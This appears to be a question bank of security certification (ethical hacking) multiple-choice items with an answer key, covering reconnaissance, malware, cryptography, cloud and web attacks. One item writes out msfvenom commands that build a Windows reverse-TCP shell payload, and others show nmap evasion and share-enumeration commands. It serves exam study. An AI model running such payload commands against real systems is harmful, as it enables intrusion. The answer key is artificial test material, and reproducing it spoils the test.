Stokes, an attacker, decided to find vulnerable IoT devices installed in the target organization. In this process, he used an online tool that helped him gather information such as a device's manufacturer details, its IP address, and the location where it is installed. What is the online tool that Stokes used in the above scenario? A DuckDuckGo B Baidu C Shodan D Bing

C

The ________ is a protocol used to provide a secure authentication mechanism between two communicating applications, such as a client and a server. A Data Encryption Standard (DES) B Wi-Fi networks monitor C Secure Sockets Layer (SSL) D Public Key Infrastructure (PKI)

C

The ________ step in steganalysis is to discover a suspicious image that may be harboring a message. A fourth B second C first D third

C

The data encryption method that is an expansion to the 802.11 protocol that allows for increased security is: A Wi-Fi chalking B Network-applications C Wi-Fi Protected Access (WPA) D Wireless encryption

C

The first and foremost step in IoT device hacking is ________. A maintaining access B vulnerability scanning C information gathering D gaining access

C

The first step in the evaluation of the security posture of the target organization's IT infrastructure is called ________. A conceptualizing B forensics C footprinting D networking

C

The method in which an attacker identifies a flaw related to access control and bypasses the authentication, and then compromises the network, is referred to as: A Cookie poisoning B Cross-Site Scripting (XSS) C Broken access control D Injection flaws

C

The process of extracting usernames, machine names, network resources, shares, and services from a system or network is called ________. A networking B footprinting C enumeration D forensics

C

The process of recovering passwords from data transmitted by computer systems or stored on them is called ________. A footprinting B enumeration C password cracking D gaining administrator privileges

C

To create a botnet, the attacker can use several techniques to scan vulnerable machines. The attacker first collects information about a large number of vulnerable machines to create a list. Subsequently, they infect the machines. The list is divided by assigning half of the list to the newly compromised machines.The scanning process runs simultaneously. This technique ensures the spreading and installation of malicious code in little time. Which technique is discussed here? A. Subnet scanning technique B. Permutation scanning technique C. Hit-list scanning technique. D. Topological scanning technique

C

To improve transmission and reception, which type of antenna design allows Wi-Fi to work effectively in only a few directions? A Yagi B Omnidirectional C Directional D Dipole

C

Todd has been asked by the security officer to purchase a counter-based authentication system. Which of the following best describes this type of system? A. A biometric system that bases authentication decisions on behavioral attributes. B. A biometric system that bases authentication decisions on physical attributes. C. An authentication system that creates one-time passwords that are encrypted with secret keys. D. An authentication system that uses passphrases that are converted into virtual passwords.

C

Using ________, attackers find vulnerabilities in the target system and then exploit those vulnerabilities. A privacy loss B social engineering C system and network attacks D information leakage

C

Victor, an employee in an organization, received an executable file as an email attachment. Out of suspicion, he reached out to the organization's IT team. The team used a tool to dismantle the executable file into a binary program to find harmful or malicious processes. Which of the following tools did the IT team employ to analyze the application? A Splunk B Spam Mimic C IDA Pro D CCleaner

C

What are common files on a web server that can be misconfigured and provide useful information for a hacker such as verbose error messages? A. httpd.conf B. administration.config C. php.ini D. idq.dll

C

What does the -oX flag do in an Nmap scan? A. Perform an eXpress scan B. Output the results in truncated format to the screen C. Output the results in XML format to a file D. Perform an Xmas scan

C

What is NOT a PCI compliance recommendation? A. Use a firewall between the public network and the payment card data. B. Use encryption to protect all transmission of card holder data over any public network. C. Rotate employees handling credit card transactions on a yearly basis to different departments. D. Limit access to card holder data to as few individuals as possible.

C

What is an advantage of public clouds? A Lack of control B Slow speed C Lack of contracts D No guaranteed security

C

What is the correct way of using MSFvenom to generate a reverse TCP shellcode for Windows? A. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f c B. msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f c C. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe D. msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe

C

What is the most common vulnerability that is mainly caused by human error, which allows attackers to gain unauthorized access to the system? A Unpatched servers B Buffer overflows C Misconfigurations D Default installations

C

What is the process of discovering design flaws that will open an operating system and its applications to attack or misuse? A Vulnerability scoring B Vulnerability reporting C Vulnerability research D Vulnerability assessment

C

What tools are used to assist network security professionals in overcoming the identified weaknesses in the device and network by suggesting various remediation techniques to protect the organization's network? A Shodan and Censys B Z-Wave and Wireshark C beSTORM and Metasploit D KillerBee and ChipWhisperer

C

When purchasing a biometric system, one of the considerations that should be reviewed is the processing speed. Which of the following best describes what it is meant by processing? A. The amount of time and resources that are necessary to maintain a biometric system B. How long it takes to setup individual user accounts C. The amount of time it takes to be either accepted or rejected from when an individual provides identification and authentication information D. The amount of time it takes to convert biometric data into a template on a smart card

C

Which Intrusion Detection System is best applicable for large environments where critical assets on the network need extra scrutiny and is ideal for observing sensitive network segments? A. Honeypots B. Firewalls C. Network-based intrusion detection system (NIDS) D. Host-based intrusion detection system (HIDS)

C

Which attack allows malicious code to run inside users' browsers even after users have closed or navigated away from the web page? A Clickjacking B DNS Rebinding C MarioNet D RC4 NOMORE

C

Which cloud concept primarily focuses on security? A IDaaS B CaaS C SECaaS D FaaS

C

Which encryption algorithm supports a maximum of 128 bits? A Camellia B Twofish C CAST-128 D Serpent

C

Which file is a rich target to discover the structure of a website during web-server footprinting? A. domain.txt B. Robots.txt C. Document root D. index.htm

C

Which key stretching countermeasure uses a password-based key derivation function? A USENIX B Blowfish C PBKDF2 D Bcrypt

C

Which of the following Metasploit module establishes a communication channel between the Metasploit framework and the victim host and combines the arbitrary code that is executed due to the success of an exploit? A Metasploit NOPS Module B Metasploit Exploit Module C Metasploit Payload Module D Metasploit Auxiliary Module

C

Which of the following Net View commands is used by an attacker to view all the available shares in a domain? A net view \<computername> /ALL B net view /domain:<domain name> C net view /domain D net view \<computername>

C

Which of the following Purdue levels is commonly referred to as an industrial demilitarized zone (IDMZ)? A Level 2 B Level 3 C Level 3.5 D Level 4

C

Which of the following algorithms does not provide any authentication for the key exchange and is vulnerable to many cryptographic attacks? A RSA B Serpent C Diffie-Hellman D DSA

C

Which of the following attacks does not directly recover a WEP key and requires at least one data packet from a target AP for initiation? A MAC spoofing attack B Evil twin attack C Fragmentation attack D De-authentication attack

C

Which of the following cloud deployment models is also known as the internal or corporate cloud and is a cloud infrastructure operated by a single organization and implemented within a corporate firewall? A Community cloud B Multi cloud C Private cloud D Public cloud

C

Which of the following commands checks for valid users on an SMTP server? A. RCPT B. CHK C. VRFY D. EXPN

C

Which of the following commands is used by the SNMP agent to inform the pre-configured SNMP manager of a certain event? A GetResponse B GetRequest C Trap D SetRequest

C

Which of the following describes the characteristics of a Boot Sector Virus? A. Modifies directory table entries so that directory entries point to the virus code instead of the actual program. B. Moves the MBR to another location on the RAM and copies itself to the original location of the MBR. C. Moves the MBR to another location on the hard disk and copies itself to the original location of the MBR. D. Overwrites the original MBR and only executes the new virus code.

C

Which of the following information does an attacker enumerate by analyzing the AWS error messages that reveal information regarding the existence of a user? A Enumerating AWS account IDs B Enumerating S3 buckets C Enumerating IAM roles D Enumerating bucket permissions

C

Which of the following involves both a public key and a private key? A Internet connection monitor B System integrity verifier C Asymmetric encryption D Symmetric encryption

C

Which of the following involves changing the information inside a cookie? A Broken access control B Injection flaws C Cookie poisoning D Cross-Site Scripting (XSS)

C

Which of the following involves using a tool to convert a straightforward program into one that works the same way, but is much harder to understand? A Wireless encryption B Security encryption C Obfuscating D Internet surfing

C

Which of the following is NOT a hacker category? A Hacktivist B Black Hats C Green Hats D White Hats

C

Which of the following is a disadvantage of a private cloud? A Control B Audit compliance C Expense D Security

C

Which of the following is a standard for data encryption that uses a secret key for both encryption and decryption (symmetric cryptosystem)? A Wi-Fi networks monitor B Home computers C Data Encryption Standard (DES) D Internet connection monitor

C

Which of the following is a unidirectional antenna commonly used in communications for a frequency band of 10 MHz to VHF and UHF? A Directional B Dipole C Yagi D Omnidirectional

C

Which of the following is a wireless technology, vulnerable to various types of attacks, that allows devices to share data over short distances? A AP address B Application device C Bluetooth D Wi-Fi network

C

Which of the following is an extremely common IDS evasion technique in the web world? A. Spyware B. Subnetting C. Unicode Characters D. Port Knocking

C

Which of the following is the best countermeasure to encrypting ransomwares? A. Use multiple antivirus software B. Pay a ransom C. Keep some generation of off-line backup D. Analyze the ransomware to get decryption key of encrypted data

C

Which of the following is the component in the docker architecture where images are stored and pulled and can be either private or public? A Docker daemon B Docker client C Docker registries D Docker objects

C

Which of the following is the least-likely physical characteristic to be used in biometric control that supports a large company? A. Iris patterns B. Voice C. Height and Weight D. Fingerprints

C

Which of the following is the most common website vulnerability on the internet? A Application injection B Command injection C SQL injection D LADP injection

C

Which of the following is the most prevalent non-voice communication on a mobile phone? A Emojis B FaceTime C Text messaging D Facebook Messenger

C

Which of the following is the practice of concealing information by converting plaintext (readable format) into cipher text (unreadable format) using a key or encryption scheme? A Intrusion Detection System (IDS) B Bandwidth networking system C Cryptography D Web analysis

C

Which of the following is the process in which the attacker confuses the IDS by forcing it to read invalid packets? A Security encryption B Internet surfing C Insertion D Wireless encryption

C

Which of the following layers of IoT architecture consists of all the hardware components, including sensors, radio-frequency identification (RFID) tags, readers, or other soft sensors? A Middleware Layer B Internet Layer C Edge Technology Layer D Access Gateway Layer

C

Which of the following overflow a computer with a large amount of connection requests, consuming all available operating system resources so that the computer cannot process legitimate users' requests? A Engineering attacks B Spear-Phishing C Connectivity attacks D Passive sniffing

C

Which of the following prevent automated software from performing actions that degrade the quality of service of a given system, whether because of abuse or resource expenditure? A Cross-site scripts B Application layers C CAPTCHAs D Internet functions

C

Which of the following program infects the system boot sector and the executable files at the same time? A. Polymorphic virus B. Stealth virus C. Multipartite Virus D. Macro virus

C

Which of the following programs is usually targeted at Microsoft Office products? A. Polymorphic virus B. Multipart virus C. Macro virus D. Stealth virus

C

Which of the following rootkit detection technique compares a snapshot of the file system, boot records, or memory with a known trusted baseline? A Signature-Based Detection B Runtime Execution Path Profiling C Integrity-Based Detection D Analyzing Memory Dumps

C

Which of the following scanning technique is a type of inverse TCP scanning technique with the FIN, URG, and PUSH flags set to send a TCP frame to a remote device? A IPv6 Scan B SCTP INIT Scanning C Xmas Scan D UDP Scan

C

Which of the following symmetric-key block ciphers has either 18 rounds for 128-bit keys or 24 rounds for 256-bit keys and uses four 8 × 8-bit S-boxes that perform affine transformations and logical operations? A RSA B Diffie-Hellman C Camellia D YAK

C

Which of the following types of password attacks does not require any technical knowledge about hacking or system exploitation and includes techniques such as shoulder surfing, social engineering, and dumpster diving? A Active online attacks B Passive online attacks C Non-electronic attacks D Offline attacks

C

Which tool is a software defined radio receiver? A HackRF B Attify C Gqrx D ChipWhisperer

C

Which type of antennas enable attackers to get better signal quality, resulting in more data to eavesdrop on, more bandwidth to abuse, and higher power output that is essential in Layer 1 DoS and man-in-the-middle attacks? A Yagi B Omnidirectional C Parabolic grid D Directional

C

Which type of attacks destroy a specific aspect of an application or service and are effective with one or a few attacking machines producing a low traffic rate? A Fragmentation attacks B TCP state-exhaustion attacks C Application layer attacks D Volumetric attacks

C

Which type of attacks have become a major threat to present computer networks? These attacks attempt to make a machine or network resource unavailable to its authorized users. A System hacking and malicious software B Packet sniffing and system hacking C Denial-of-Service and Distributed Denial of Service D Internet software and malicious software

C

Which type of attacks occur when attackers use USB adapters or wireless cards? A War driving B AP misconfiguration C Ad-hoc associations D MAC spoofing

C

Which type of malware uses legitimate programs to infect a computer? A Worm B Virus C Fileless D Trojan

C

Which type of vulnerability assessment is also known as an authenticated assessment? A Distributed assessment B Non-credentialed assessment C Credentialed assessment D Database assessment

C

Which vulnerability affects HTTPS and other services that rely on SSL and TLS protocols? A Cryptosense B Padding Oracle C DROWN D Related-Key

C

Which website can be used to gather footprinting information of a target across social media platforms? A Wordpress.com B Cybrary.it C Mention.com D Shodan.io

C

Which wireless encryption standard supports 256-bit Galois/Counter Mode Protocol? A WPA2 B WEP C WPA3 D WPA

C

While performing online banking using a Web browser, a user receives an email that contains a link to an interesting Web site. When the user clicks on the link, another Web browser session starts and displays a video of cats playing the piano. The next business day, the user receives what looks like an email from his bank, indicating that his bank account has been accessed from a foreign country. The email asks the user to call his bank and verify the authorization of a funds transfer that took place. What Web browser-based security vulnerability was exploited to compromise the user? A. Clickjacking B. Cross-Site Scripting C. Cross-Site Request Forgery D. Web form input validation

C

While using your bank's online servicing you notice the following string in the URL bar: "http://www.MyPersonalBank.com/account?id=368940911028389&Damount=10980&Camount=21" You observe that if you modify the Damount & Camount values and submit the request, that data on the web page reflect the changes. Which type of vulnerability is present on this site? A. Cookie Tampering B. SQL Injection C. Web Parameter Tampering D. XSS Reflection

C

Wireless networks use which type of technology to interconnect two individual points without establishing any physical connection between them? A MAC address codes B Hardware C Electromagnetic waves D Software programs

C

You are attempting to run an Nmap port scan on a web server. Which of the following commands would result in a scan of common ports with the least amount of noise in order to evade IDS? A. nmap -A - Pn B. nmap -sP -p-65535 -T5 C. nmap -sT -O -T0 D. nmap -A --host-timeout 99 -T1

C

You have been authorized to perform a penetration test against a website. You want to use Google dorks to footprint the site but only want results that show file extensions. What Google dork operator would you use? A. inurl B. site C. ext D. filetype

C

You have gained physical access to a Windows 2008 R2 server, which has an accessible disc drive. When you attempt to boot the server and log in, you are unable to guess the password. In your toolkit, you have an Ubuntu 9.10 Linux LiveCD. Which Linux-based tool can change any user's password or activate disabled Windows accounts? A. John the Ripper B. SET C. CHNTPW D. Cain & Abel

C

________ about social engineering and its effects among the workforce makes the organization an easy target. A Moral obligations B Fears C Ignorance D Policies

C

________ are a type of "glueware" used to bind other software components together and encapsulate several components into a single data source making it usable in a more convenient fashion than the original source. A Defensive files B Cache files C Wrappers D Trojan horses

C

________ are individuals with a wide range of skills, motivated by religious or political beliefs to create fear of large-scale disruption of computer networks. A Script Kiddies B Black Hats C Cyber Terrorists D Hacktivists

C

________ are the rapidly increasing online services, platforms, or other sites that allow people to connect with each other and to build social relations. A Special engineering sites B System sites C Social networking sites D Information sites

C

________ are the scourge of modern computing and have the potential to wreak havoc on both business and personal computers. A Botnets B Robot testing files C Viruses D Eviscerating Trojans

C

________ channel is a legal channel for the transfer of data or information in a company network and works securely to transfer data and information. A Internet B Trojan C Overt D Covert

C

________ has evolved from the convergence of wireless technology, micro-electromechanical systems, micro-services, and the internet. A Wi-Fi B BYOD C IoT D AT-AT

C

________ involves connecting to or probing TCP and UDP ports on the target system to determine if the services are running or are in a listening state. A Vulnerability scanning B Workstation scanning C Port scanning D Network scanning

C

________ is a malicious piece of code or script that is developed using server-side languages such as PHP, ASP, PERL, RUBY, and Python, and then installed on a target server to gain remote access or remote administration capabilities over the target server. A Web Service B REST API C Web Shell D Web API

C

________ is the assurance that the systems responsible for delivering, storing, and processing information are accessible when required by authorized users. A Integrity B Confidentiality C Availability D Authenticity

C

________ is the process of gathering additional detailed information about the target using highly complex and aggressive reconnaissance techniques. A Pen testing B Reconnaissance C Scanning D Targeting

C

________ is the second stage of system hacking. Attackers use passwords obtained in the first step to gain access to the target system and then try to attain higher-level privileges in the system. A Salting B Pen testing C Escalating privileges D Enumeration

C

________ scanning allows an attacker to identify vulnerabilities or weaknesses in a system or network to determine how they can exploit the system. A Zero-day B Exploit C Vulnerability D Payload

C

________ social engineering depends on computers and internet systems to carry out the targeted action. A Mobile-based B Social-based C Computer-based D Human-based

C

________ uses aggressive tactics such as keyword stuffing, doorway pages, page swapping, and adding unrelated keywords in an effort to get a higher search engine ranking for their malware pages. A Spear-Phishing B Drive-by Downloads C Black Hat Search Engine Optimization (SEO) D Social Engineered Click-Jacking

C

________, also known as a one-click attack, occurs when a hacker instructs a user's web browser to send a request to the vulnerable website through a malicious webpage. A Cheat sheet B Command injection C Cross-site request forgery D Application injection

C

A ________ is a small piece of software designed to fix problems, security vulnerabilities, and bugs while improving the usability or performance of a computer program or its supporting data. A hotfix B malware C vulnerability D patch

D

A ________ is a special type of malware that can replicate itself and use memory, but cannot attach itself to other programs. A spyware B track C spike D worm

D

A ________ is an internet system designed especially for diverting attackers by tricking or attracting them during attempts to gain unauthorized access to information systems. A source router B application device C Wi-Fi network D honeypot

D

A friend of yours tells you that he downloaded and executed a file that was sent to him by a coworker. Since the file did nothing when executed, he asks you for help because he suspects that he may have installed a trojan on his computer. What tests would you perform to determine whether his computer is infected? A. Upload the file to VirusTotal. B. You do not check; rather, you immediately restore a previous snapshot of the operating system. C. Use ExifTool and check for malicious content. D. Use netstat and check for outgoing connections to strange IP addresses or domains.

D

A post-breach forensic investigation revealed that a known vulnerability in Apache Struts was to blame for the Equifax data breach that affected 143 million customers. A fix was available from the software vendor for several months prior to the intrusion. This is likely a failure in which of the following security processes? A. Secure development lifecycle B. Security awareness training C. Vendor risk management D. Patch management

D

A(n) ________ attack is the form of DDoS attack where attackers exploit a number of bugs in ________ servers to initiate a DDoS attack. A TCP state-exhaustion B application layer C fragmentation D peer-to-peer

D

Abel, a security professional, conducts penetration testing in his client organization to check for any security loopholes. He launched an attack on the DHCP servers by broadcasting forged DHCP requests and leased all the DHCP addresses available in the DHCP scope until the server could not issue any more IP addresses. This led to a DoS attack, and as a result, legitimate employees were unable to access the client's network. Which of the following attacks did Abel perform in the above scenario? A. Rogue DHCP server attack B. VLAN hopping C. STP attack D. DHCP starvation

D

Advantages of Infrastructure-as-a-Service (IaaS) are all of the following EXCEPT: A Guaranteed uptime B Task automation C Global accessibility D Lower risk

D

Alice needs to send a confidential document to her coworker, Brian. Their company has public key infrastructure set up. Therefore, Alice both encrypts the message and digitally signs it. Alice uses _______________ to encrypt the message, and Brian uses _______________ to confirm the digital signature. A. Brian's public key; Brian's public key B. Alice's public key; Alice's public key C. Brian's private key; Alice's public key D. Brian's public key; Alice's public key

D

An attacker has installed a RAT on a host. The attacker wants to ensure that when a user attempts to go to "www.MyPersonalBank.com", the user is directed to a phishing site. Which file does the attacker need to modify? A. Boot.ini B. Sudoers C. Networks D. Hosts

D

An/A ________ is security software or a hardware device used to monitor, detect, and protect networks or systems from malicious activities; it alerts the concerned security personnel immediately upon detecting intrusions. A advanced encryption system B bandwidth networking system C Wi-Fi D Intrusion Detection System (IDS)

D

Anonymizers have ________ basic type(s). A three B one C four D two

D

App ________ is a security mechanism that helps protect systems and users by limiting the resources the app can access for its intended functionality on the mobile platform. A revision B coding C scanning D sandboxing

D

Attackers use information gathering tools, such as ________ and ________, to gather basic information about the target device and network. A KillerBee / ChipWhisperer B beSTORM / Metasploit C Z-Wave / Wireshark D Shodan / Censys

D

Based on the below log, which of the following sentences are true? Mar 1, 2016, 7:33:28 AM 10.240.250.23 - 54373 10.249.253.15 - 22 tcp_ip A. Application is FTP and 10.240.250.23 is the client and 10.249.253.15 is the server. B. Application is SSH and 10.240.250.23 is the server and 10.249.253.15 is the client. C. SSH communications are encrypted; itג€™s impossible to know who is the client or the server. D. Application is SSH and 10.240.250.23 is the client and 10.249.253.15 is the server.

D

Boney, a professional hacker, targets an organization for financial benefits. He performs an attack by sending his session ID using an MITM attack technique. Boney first obtains a valid session ID by logging into a service and later feeds the same session ID to the target employee. The session ID links the target employee to Boney's account page without disclosing any information to the victim. When the target employee clicks on the link, all the sensitive payment details entered in a form are linked to Boney's account. What is the attack performed by Boney in the above scenario? A. Forbidden attack B. CRIME attack C. Session donation attack D. Session fixation attack

D

CompanyXYZ has asked you to assess the security of their perimeter email gateway. From your office in New York, you craft a specially formatted email message and send it across the Internet to an employee of CompanyXYZ. The employee of CompanyXYZ is aware of your test. Your email message looks like this: From: [email protected] To: [email protected] Subject: Test message Date: 4/3/2017 14:37 The employee of CompanyXYZ receives your email message. This proves that CompanyXYZ's email gateway doesn't prevent what? A. Email Masquerading B. Email Harvesting C. Email Phishing D. Email Spoofing

D

Defense in Depth helps to prevent ________ against an information system and its data because a break in one layer only leads the attacker to gain access to a single system. A indirect attacks B hacking attacks C internal attacks D direct attacks

D

Disadvantages of Software-as-a-Service (SaaS) include all the following EXCEPT: A Switching between SaaS vendors is difficult B Security and latency issue C Total dependency on the internet D Data privacy

D

Don, a student, came across a gaming app in a third-party app store and installed it. Subsequently, all the legitimate apps in his smartphone were replaced by deceptive applications that appeared legitimate. He also received many advertisements on his smartphone after installing the app. What is the attack performed on Don in the above scenario? A. SIM card attack B. Clickjacking C. SMS phishing attack D. Agent Smith attack

D

During a recent security assessment, you discover the organization has one Domain Name Server (DNS) in a Demilitarized Zone (DMZ) and a second DNS server on the internal network. What is this type of DNS configuration commonly called? A. DynDNS B. DNS Scheme C. DNSSEC D. Split DNS

D

Email is transmitted across the Internet using the Simple Mail Transport Protocol. SMTP does not encrypt email, leaving the information in the message vulnerable to being read by an unauthorized person. SMTP can upgrade a connection between two mail servers to use TLS. Email transmitted by SMTP over TLS is encrypted. What is the name of the command used by SMTP to transmit email over TLS? A. OPPORTUNISTICTLS B. UPGRADETLS C. FORCETLS D. STARTTLS

D

Ethical hacker Jane Doe is attempting to crack the password of the head of the IT department of ABC company. She is utilizing a rainbow table and notices upon entering a password that extra characters are added to the password after submitting. What countermeasure is the company using to protect against rainbow tables? A. Account lockout B. Password hashing C. Password key hashing D. Password salting

D

For attackers, motives are the same as: A Ethics B Ideas C Values D Goals

D

Gerard, a disgruntled ex-employee of Sunglass IT Solutions, targets this organization to perform sophisticated attacks and bring down its reputation in the market. To launch the attacks process, he performed DNS footprinting to gather information about DNS servers and to identify the hosts connected in the target network. He used an automated tool that can retrieve information about DNS zone data including DNS domain names, computer names, IP addresses, DNS records, and network Whois records. He further exploited this information to launch other sophisticated attacks. What is the tool employed by Gerard in the above scenario? A. Towelroot B. Knative C. zANTI D. Bluto

D

Given below are the different steps involved in exploiting vulnerabilities. 1) Develop the exploit. 2) Determine the risk associated with the vulnerability. 3) Determine the capability of the vulnerability. 4) Identify the vulnerability. 5) Gain remote access. 6) Select the method for delivering: local or remote. 7) Generate and deliver the payload. What is the correct sequence of steps involved in exploiting vulnerabilities? A 1 → 2 → 3 → 4 → 5 → 6 → 7 B 3 → 6 → 7 → 4 → 2 → 1 → 5 C 2 → 3 → 6 → 4 → 5 → 1 → 7 D 4 → 2 → 3 → 1 → 6 → 7 → 5

D

Given the vulnerability-management life cycle steps below, which list shows the correct sequence of steps in the post assessment phase? Monitoring Remediation Risk Assessment Verification A Monitoring, risk assessment, verification, remediation B Verification, remediation, risk assessment, monitoring C Verification, monitoring, risk assessment, remediation D Risk assessment, remediation, verification, monitoring

D

How many categories of security controls are there? A Three B One C Two D Four

D

Identify the DoS/DDoS attack technique, in which the attacker spoofs the source IP address with the victim's IP address and sends a large number of ICMP ECHO request packets to an IP broadcast network. A Pulse Wave DDoS Attack B Zero-Day DDoS Attack C Ping of Death Attack D Smurf Attack

D

Identify the SNMP MIB that manages the TCP/IP-based Internet using a simple architecture and system. A WINS.MIB B DHCP.MIB C HOSTMIB.MIB D MIB_II.MIB

D

Identify the cloud service that provides virtual machines and other abstracted hardware and operating systems (OSs), which may be controlled through a service application programming interface (API). A SaaS B PaaS C IDaaS D IaaS

D

Identify the drozer tool command that lists out various exported activities on Android devices and apps. A dz> run app.package.list -f B dz> run app.package.list C dz> run app.package.info -a D dz> run app.package.attacksurface

D

In ________ social engineering, the attacker performs a social-engineering attack using malicious mobile apps. A computer-based B human-based C social-based D mobile-based

D

In a/an ________ SQL injection, the attacker intentionally inserts bad input into the application, causing it to throw database errors. A baseless B blind C DoS/DDoS D error-based

D

In a/an ________ attack, the attacker listens to the conversation between the user and the server and captures the authentication token of the user. A TCP Stat-exhaustion B application layer C cross-site script D session replay

D

In one of the following jailbreaking techniques, a user turns their device off and back on, following which the device starts up completely and the kernel is patched without the help of a computer. Which is this jailbreaking technique? A Semi-tethered jailbreaking B Tethered jailbreaking C Semi-untethered jailbreaking D Untethered jailbreaking

D

In the Common Vulnerability Scoring System (CVSS) v3.1 severity ratings, what range does medium vulnerability fall in? A. 4.0-6.0 B. 3.9-6.9 C. 3.0-6.9 D. 4.0-6.9

D

In which of the following attacks can an attacker inject malicious data or commands into intercepted communications in a TCP session, even if the victim disables source routing? A RST Hijacking B TCP/IP Hijacking C UDP Hijacking D Blind Hijacking

D

In which of the following attacks does an attacker install a fake communication tower between two authentic endpoints with the intention of misleading a user and interrupting the data transmission between the user and real tower to hijack an active session? A Rogue AP attack B Key reinstallation attack C Wardriving D aLTEr attack

D

In which of the following ciphers does the user replace units of plaintext with ciphertext according to a regular system? A Stream cipher B Transposition cipher C Block cipher D Substitution cipher

D

In which of the following vulnerability assessment solutions does the scanning start by building an inventory of protocols found on the machine? A Product-Based Solutions B Service-Based Solutions C Tree-Based Assessment D Inference-Based Assessment

D

Information security refers to ________ or ________ information and information systems that use, store, and transmit information from unauthorized access, disclosure, alteration, and destruction. A compiling / securing B imaging / shielding C duplicating / saving D protecting / safeguarding

D

Information warfare is divided into ________ categories. A five B four C six D seven

D

Joe works as an IT administrator in an organization and has recently set up a cloud computing service for the organization. To implement this service, he reached out to a telecom company for providing Internet connectivity and transport services between the organization and the cloud service provider. In the NIST cloud deployment reference architecture, under which category does the telecom company fall in the above scenario? A. Cloud consumer B. Cloud broker C. Cloud auditor D. Cloud carrier

D

John wants to send Marie an email that includes sensitive information, and he does not trust the network that he is connected to. Marie gives him the idea of using PGP. What should John do to communicate correctly using this type of encryption? A. Use his own private key to encrypt the message. B. Use his own public key to encrypt the message. C. Use Marie's private key to encrypt the message. D. Use Marie's public key to encrypt the message.

D

John, a professional hacker, decided to use DNS to perform data exfiltration on a target network. In this process, he embedded malicious data into the DNS protocol packets that even DNSSEC cannot detect. Using this technique, John successfully injected malware to bypass a firewall and maintained communication with the victim machine and C&C server. What is the technique employed by John to bypass the firewall? A. DNSSEC zone walking B. DNS cache snooping C. DNS enumeration D. DNS tunneling method

D

John, an employee of an organization, always connects to the corporate network using his own mobile device. Which of the following best practices prevents BYOD risk when John connects to the corporate network? A Improperly disposing of a device B Not reporting a lost or stolen device C Providing support for many different devices D Separating personal and private data

D

Lightweight Directory Access Protocol (LDAP) accesses directory listings within a/an ________ or from other directory services. A virtual database B footprint file C cache file D Active Directory

D

Once the system is successfully ________, attackers are free to perform malicious activities such as stealing sensitive data, implementing a sniffer to capture network traffic, and infecting the system with malware. A networked B enumerated C footprinted D accessed

D

One of the following techniques redirects all malicious network traffic to a honeypot after any intrusion attempt is detected. Attackers can identify such honeypots by examining specific TCP/IP parameters such as the round-trip time (RTT), time to live (TTL), and TCP timestamp. Which is this technique? A Fake AP B Snort_inline C User-Mode Linux (UML) D Bait and switch

D

Rick, an ethical hacker, is performing a vulnerability assessment on an organization and a security audit on the organization's network. In this process, he used a tool for identifying vulnerabilities, configuration issues, and malware that attackers use to penetrate networks. Which of the following tools did Rick use to perform vulnerability assessment? A Metagoofil B Infoga C Immunity Debugger D Nessus

D

Scenario: 1. Victim opens the attacker's web site. 2. Attacker sets up a web site which contains interesting and attractive content like "Do you want to make $1000 in a day?". 3. Victim clicks to the interesting and attractive content URL. 4. Attacker creates a transparent 'iframe' in front of the URL which the victim attempts to click, so the victim thinks that he/she clicks on the "Do you want to make$1000 in a day?" URL but actually he/she clicks on the content or URL that exists in the transparent 'iframe' which is setup by the attacker. What is the name of the attack which is mentioned in the scenario? A. Session Fixation B. HTML Injection C. HTTP Parameter Pollution D. Clickjacking Attack

D

Scenario: Joe turns on his home computer to access personal online banking. When he enters the URL www.bank.com, the website is displayed, but it prompts him to re-enter his credentials as if he has never visited the site before. When he examines the website URL closer, he finds that the site is NOT secure and the web address appears different. What type of attack he is experiencing? A. DHCP spoofing B. DoS attack C. ARP cache poisoning D. DNS hijacking

D

Session splicing is an IDS evasion technique in which an attacker delivers data in multiple, small sized packets to the target computer, making it very difficult for an IDS to detect the attack signatures. Which tool can be used to perform session splicing attacks? A. tcpsplice B. Burp C. Hydra D. Whisker

D

Shellshock allowed an unauthorized user to gain access to a server. It affected many Internet-facing services, which OS did it NOT directly affect? A. Linux B. Unix C. OS X D. Windows

D

Social engineering deals with ________ tricks employed to gain desired information. A network B hacking C card D psychological

D

Steve, an attacker, created a fake profile on a social media website and sent a request to Stella. Stella was enthralled by Steve's profile picture and the description given for his profile, and she initiated a conversation with him soon after accepting the request. After a few days, Steve started asking about her company details and eventually gathered all the essential information regarding her company. What is the social engineering technique Steve employed in the above scenario? A. Baiting B. Piggybacking C. Diversion theft D. Honey trap

D

The attacks that consume the connection state tables present in the network infrastructure devices such as load-balancers, firewalls, and application servers are called: A Fragmentation attacks B Application layer attacks C Volumetric attacks D Protocol attacks

D

The change of a hard drive failure is once every three years. The cost to buy a new hard drive is $300. It will require 10 hours to restore the OS and software to the new hard disk. It will require a further 4 hours to restore the database from the last backup to the new hard disk. The recovery person earns $10/hour.Calculate the SLE, ARO, and ALE. Assume the EF = 1(100%). What is the closest approximate cost of this replacement and recovery operation per year? A. $1320 B. $440 C. $100 D. $146

D

The lifetime of a virus depends on: A Eviscerating Trojans B Robot testing files C The virus itself D Its ability to reproduce

D

The main function of web applications is to ________ a database. A control content of B facilitate time in C behave as a search engine for D fetch user-requested data from

D

The major role of ________ is to confirm that a user is who he or she claims to be. A availability B integrity C confidentiality D authenticity

D

The network users are complaining because their systems are slowing down. Further, every time they attempt to go to a website, they receive a series of pop-ups with advertisements. What type of malware have the systems been infected with? A. Trojan B. Spyware C. Virus D. Adware

D

The vulnerability ________ discloses the risks that are detected after scanning the network. A methodology B score C research D report

D

There are ________ phases of hacking. A six B four C three D five

D

Through which of the following SCADA vulnerabilities does an attacker exploit code security issues that include out-of-bound read/write vulnerabilities and heap- and stack-based buffer overflow? A Credential management B Code injection C Lack of authorization D Memory corruption

D

To determine if a software program properly handles a wide range of invalid input, a form of automated testing can be used to randomly generate invalid input in an attempt to crash the program. What term is commonly used when referring to this type of testing? A. Randomizing B. Bounding C. Mutating D. Fuzzing

D

User A is writing a sensitive email message to user B outside the local network. User A has chosen to use PKI to secure his message and ensure only user B can read the sensitive email. At what layer of the OSI layer does the encryption and decryption of the message take place? A. Application B. Transport C. Session D. Presentation

D

Vulnerability assessments scan networks for ________ security weaknesses. A zero day B unknown C 0 day D known

D

